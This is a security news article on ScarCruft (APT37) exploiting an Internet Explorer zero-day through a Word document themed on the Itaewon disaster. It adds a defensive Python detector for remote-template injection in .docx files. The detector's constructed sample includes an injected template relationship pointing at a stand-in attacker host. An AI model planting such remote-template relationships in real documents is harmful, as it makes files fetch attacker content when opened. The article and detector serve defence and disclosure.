Posted on December 9, 2022 at 2:51 PM
Hackers based in North Korea have exploited a zero-day vulnerability in Internet Explorer. They targeted users in South Korea by trading on public interest in the recent Itaewon Halloween crowd crush, tricking users into opening a malicious document that installs malware on their devices.
Google warns of zero-day vulnerability on Internet Explorer
Researchers with the Google Threat Analysis Group (TAG), Benoît Sevens and Clément Lecigne, discovered the exploit. The discovery adds to the list of attacks attributed to the ScarCruft threat actor group.
ScarCruft is also tracked as APT37, Reaper, InkySquid, and Ricochet Chollima. The Google researchers noted that the group has a history of targeting particular individuals, including but not limited to South Korean users.
In the Thursday analysis, the researchers noted that “the group has historically focused their targeting on South Korean users, North Korean defectors, policymakers, journalists, and human rights activists.”
The researchers also note that the group has exploited Internet Explorer vulnerabilities before, including CVE-2020-1380 and CVE-2021-26411, to deliver backdoors such as BLUELIGHT and Dolphin.
The Dolphin backdoor was only disclosed recently, by the cybersecurity company ESET towards the end of last month, and APT37 already appears to be deploying it in its campaigns.
Another tool associated with the group is RokRat, a remote access trojan for Windows with a wide range of capabilities, including capturing screenshots, logging keystrokes, and harvesting information about paired Bluetooth devices.
Google's team also documented the attack chain. The actors used a malicious Microsoft Word document that was uploaded to VirusTotal on October 31, 2022.
Targeting South Korean users
The document's lure referred to the tragedy in the Itaewon neighborhood on October 29, taking advantage of the high public interest in the incident.
Researchers noted that it was not surprising that the group targeted users in South Korea, but that the group had not used a zero-day exploit for some time, which makes this case stand out.
Filip Jurcacko, a researcher with the ESET cybersecurity company, noted, “It is not surprising that they continue to target South Korean users. We haven’t seen ScarCruft use zero-day exploits for some time. Previously, they were repurposing public PoCs of n-day exploits.”
Once a user opens the file, the exploit fires. The document pulls in a remote template, and because Microsoft Office renders the resulting HTML content using the Internet Explorer engine, the IE vulnerability is reachable from a Word document even on systems where IE is no longer used as a browser. This is what makes the exploit chain practical.
MalwareHunterTeam also noted that this was not the first sighting of the Word file in question: according to them, the same malicious file was shared by the Shadow Chaser Group on October 31 this year.
That team described the malicious Word file as an “interesting DOCX injection template sample” with origins in Korea, consistent with the same campaign targeting users based in South Korea.
After the vulnerability was triggered, the exploit delivered shellcode that erases traces of exploitation by clearing the Internet Explorer cache and history before downloading the next-stage payload.
The Google researchers noted that they could not recover the final payload used in the campaign, but added that it was likely one of the group's known backdoors, such as RokRat, BLUELIGHT, or Dolphin.
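The "DOCX injection template" the researchers describe is a Word document whose settings relationships point at a template hosted on an attacker's server; Word fetches it when the file is opened, and the fetched content is what reaches the Internet Explorer engine. As an added example (not code from the article, Google TAG, ESET, or MalwareHunterTeam), the following Python check opens a .docx as the ZIP container it is and flags any attachedTemplate relationship whose target is external. The sample documents are constructed in memory, and the template URL is a placeholder, not any real campaign infrastructure.

```python
"""Detect Word remote-template injection by inspecting a .docx's relationships.

Added example. A .docx is a ZIP of OPC parts; an attached template is declared
in word/_rels/settings.xml.rels as a Relationship of type attachedTemplate.
A benign document either has no such relationship or points at a local .dotx;
a remote template injection sets TargetMode="External" with an http(s) URL.
"""
from __future__ import annotations

import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def find_remote_templates(docx_bytes: bytes) -> list[str]:
    """Return the external attachedTemplate targets declared in the document."""
    hits: list[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return hits  # no settings relationships at all: nothing to fetch
        root = ET.fromstring(z.read(SETTINGS_RELS))
        for rel in root.findall(f"{{{REL_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            # Either the explicit External mode or a URL scheme means Word will
            # reach out over the network when the file is opened.
            if rel.get("TargetMode") == "External" or target.lower().startswith(
                ("http://", "https://")
            ):
                hits.append(target)
    return hits


def build_docx(rels_xml: str | None) -> bytes:
    """Build a minimal .docx in memory (constructed sample, not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if rels_xml is not None:
            z.writestr(SETTINGS_RELS, rels_xml)
    return buf.getvalue()


# Constructed relationship parts: one injected (remote), one benign (local).
INJECTED_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"
    Target="https://attacker.example/template.dotm" TargetMode="External"/>
</Relationships>"""

LOCAL_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="Normal.dotm"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("injected", INJECTED_RELS), ("local", LOCAL_RELS), ("none", None)):
        print(label, find_remote_templates(build_docx(rels)))
```

Run the file directly to see the three verdicts; to triage a real sample, pass the bytes of the suspect .docx to find_remote_templates. A non-empty result means Word will make a network request on open, which is worth blocking at the gateway regardless of whether the fetched template carries an IE exploit.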
“Given the rarity/scarcity of zero-day exploits, we expect ScarCruft would use it in combination with some of their more sophisticated backdoors, such as Dolphin. Moreover, the office theme of [command-and-control] domains matches previous campaigns,” the Google TAG team noted.